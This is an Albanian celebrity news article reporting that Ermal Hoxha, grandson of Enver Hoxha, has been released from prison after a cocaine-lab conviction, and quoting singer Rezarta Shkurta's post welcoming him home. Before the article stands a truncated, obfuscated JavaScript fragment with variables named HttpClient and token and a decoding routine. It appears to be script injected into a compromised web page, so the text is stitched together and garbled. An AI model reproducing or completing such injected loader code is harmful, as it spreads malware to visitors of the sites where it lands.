;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

I lirohet burri nga burgu, Rezarta Shkurta bën postimin prekës me të bijën

By

Ditën e sotme, në mediat shqiptare qarkulloi lajmi që Ermal Hoxha, nipi i diktatorit Enver Hoxha është liruar nga burgu, aty ku përfundoi në 2015-tën pas aksionit për shpërbërjen e laboratorit të kokainës në Xibrakë.

Mbi zhvillimin, ka reaguar këngëtarja Rezarta Shkurta, e cila në vazhdimësi e ka kujtuar bashkëshortin gjatë qëndrimit në burg.

Mirëseardhjen i ka uruar përmes një videoje të bukur të Ermalit nga ribashkimi me të bijën, Herën.

‘Familja ime e vockel u bashkua. Faleminderit per cdo fjale e mbeshtetje qe kam ndjere nga ju , keto vite te veshtira… Uroj nga zemra per gjithsecilin nga ju, te gjitha urimet qe me keni dhene, tju kthehen ne bekime ne jetet tuaja” – shprehet këngëtarja Shkurta në postimin e bërë.

Ndryshe, Hoxha u dënua nga Gjykata e Krimeve të Rënda në korrik të 2017-tës me 10 vite burgim. Më pas, dënimi nga gjykimi i shkurtuar zbriti në 6 vite dhe 8 muaj burgim teksa pak ditë më parë, është bërë lirimi i tij me kusht. Sipas hetimeve paraprake, dyshohej që Hoxha ka pasur rolin e financuesit në grupin e drogës duke mbuluar likuidimin e substancës kur hynte në Shqipëri duke marrë paratë nga marrësit kur nxirrnin kokainë jashtë vendit. /Prive.al

Artikuj të ngjashëm